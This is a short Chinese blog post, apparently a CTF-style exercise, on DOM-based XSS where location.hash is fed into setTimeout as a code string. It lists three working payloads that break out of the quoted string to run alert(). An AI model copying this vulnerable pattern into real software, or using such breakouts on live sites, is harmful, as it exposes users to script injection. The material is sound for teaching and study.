2. 程式人生 > >【XSS】之錨點

【XSS】之錨點

阿新 發佈:2017-11-03
eval 源碼 div rip function 函數 settime cati ash

今天P師傅發了一個XSS鏈接,讓利用一下,源碼如下

<script type="text/javascript">

var x=location.hash;
function aa(x){};
setTimeout("aa(‘"+x+"‘)",100);

</script>

然後看了下setTimeout這個函數,用法如下:

語法

setTimeout(code,millisec)
參數描述
code 必需。要調用的函數後要執行的 JavaScript 代碼串。
millisec 必需。在執行代碼前需等待的毫秒數。

帶入函數可以成功執行的幾個函數如下:

setTimeout("aa(‘‘,alert(1),‘‘)",1000);
setTimeout("aa(‘‘,alert(2))//‘)",1000);    
setTimeout("aa(‘‘);alert(3);eval(‘‘)",1000);

【XSS】之錨點

相關推薦

XSS

eval 源碼 div rip function 函數 settime cati ash 今天P師傅發了一個XSS鏈接,讓利用一下,源碼如下 <script type="text/javascript"> var x=location.hash; funct

PCL學習筆記快速特徵直方圖FPFH - pcl::FPFHSignature33

【PCL學習筆記】之快速點特徵直方圖FPFH - pcl::FPFHSignature33 1. pcl::FPFHSignature33介紹 先來看 pcl::FPFHSignature33 的原始碼: /** \brief A point structure r

NumPy 常見運算(min、max、mean、sum、exp、sqrt、sort、乘法、積、物件拼接/切分)

____tz_zs 之前把 numpy 資料寫在了同一篇部落格裡,發現非常難以查閱,於是按功能切分開來。 運算 ndarray.min() / np.min(ndarray) ndarray.max() / np.max(ndarray) ndarray.m

XSS對抗蠕蟲 —— 如何讓按鈕不被 JS 自動

前言 XSS 自動點按鈕有什麼危害? 在社交網路裡,很多操作都是通過點選按鈕發起的,例如發表留言。假如留言系統有 XSS,使用者中招後除了基本攻擊外,還能進行傳播 —— XSS 自動填入留言內容,並模擬點擊發表按鈕,於是就能釋出帶有惡意程式碼的留言。好友看了中招後,又傳播給他們的好友。。。從而形成蠕蟲擴散。

Python知識點面試小列表生成式小坑

ada 調用 strong res 得到 bad 裝飾器 print eve 1、問題 有這麽一個小面試題: 看下面代碼請回答輸出的結果是什麽?為什麽? result = [lambda x: x + i for i in range(10)] print(re

rediscentos6.x安裝redis3.0.x

local con releases 新建 zxvf 分享 執行 .tar.gz all centos6.9_x86_64 1、下載redis安裝包 http://download.redis.io/releases/redis-3.2.9.tar.gz 2、解壓 tar

AMQJMS Mesage structure(JMS消息結構)

api 兼容 ctu 標識 提供商 nbsp 連接 特定 ext Δ消息體:JMS API 定義了5種消息格式也叫消息類型,可以使用不同形式發送和接收數據,並可以兼容現有的消息格式 TextMessage,MapMessage,ByteMessage,StreamMessa

BZOJ3451Tyvj1953 Normal 分治+FFT+期望

bzoj3 一點 orm 建議 nor 希望 復雜度 mes operator 【BZOJ3451】Tyvj1953 Normal Description 某天WJMZBMR學習了一個神奇的算法:樹的點分治!這個算法的核心是這樣的:消耗時間=0Solve(樹 a)

javajava代碼的執行機制

() alt 分享 str clas not roc 成員 輸入 要在JVM中執行java代碼必須要編譯為class文件,JDK是如何將Java代碼編譯為class文件,這種機制通常被稱為Java源碼編譯機制。 1、JVM定義了class文件的格式,但是並沒有定義如何將ja

springbootstarter pom

soc jet rep uri shel mvc must batch god SpringBoot針對不同業務提供了不同的starter pom,根據springboot版本不同可能有差異。 spring-boot-starter springboot核心start

MantisBT在linux環境上的安裝搭建

bts mantisbt 在工作中,選用了MantisBT作為公司的BTS工具。MantisBT的作為一款缺陷跟蹤管理系統,有以下優點:開源、 免費;可與開源的testlink集成,便於統計bug的用例發現率;具有bug關聯功能;權限設置靈活,不同角色有不同權限;具有郵件通知功能,每個用戶可根據自身的工

BZOJ4817[Sdoi2017]樹塗色 LCT+線段樹

sum urn using sof 兩個 如果 std bsp char 【BZOJ4817】[Sdoi2017]樹點塗色 Description Bob有一棵n個點的有根樹,其中1號點是根節點。Bob在每個點上塗了顏色,並且每個點上的顏色不同。定義一條路徑的權值是

模板Tarjan縮

pri set n) ans class namespace val names -a 洛谷3387 1 #include<cstdio> 2 #include<algorithm> 3 #include<cstring> 4

day40 python MySQL 索引視圖觸發器存儲過程函數

cin 數量 存儲 自動 條件語句 ima doc 有序 lan 1.索引   索引相當於圖書的目錄,可以幫助用戶快速的找到需要的內容.   數據庫利用各種各樣的快速定位技術,能夠大大提高查詢效率。特別是當數據量非常大,查詢涉及多個表時,使用索引往往能使查詢速度加快成千上

題解平面最近對(加強版)

double clas .org ace gpo bits scanf 簡單 name 洛谷P1429 很久以前就見過並想做的一道題…… 但大概是那個時候太蒻竟然一直不敢做呢,想想時間真的過得好快,從寫‘Hello World’到如今,其實也不過是短短的一個學期呀。 這道題

ELKCentos6.9_x64安裝elasticsearch6.2.1

limits style 圖片 script 下載 con its eight OS 1、下載elasticsearch6.2.1 wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch

ELKKibana使用

query from indices pre earch arch dice 使用 style GET _search { "query": { "match_all": {} } } GET _cat/indices GET elk-2018.06

linux查看磁盤占用情況

分享圖片 查看當前目錄 當前 In 圖片 硬盤 當前目錄 情況 image 查看整個硬盤使用情況: 1、df -h 2、du -bs xx 具體目錄占用情況 3、查看當前目錄大於100M的文件 find . -size +100M 【linux】之查

bzoj4817[Sdoi2017]樹塗色&&bzoj3779-重組病毒

dfs序 dfs 顏色 bzoj3779 我們 style 病毒 bzoj tro 題解: 兩道幾乎差不多的題(所以說當年sdoi考了道原題) 都是將樹上一段改為新顏色詢問顏色數目 可以把改成新顏色這個操作看成access操作 然後通過線段樹+dfs序來維護 另外

bzoj4520CQOI2016K遠

col span ron tree str 題解 font kd-tree pan 題解: kd-tree裸題 對每個點維護最近的k個開個堆維護一下bzoj4520【CQOI2016】K遠點對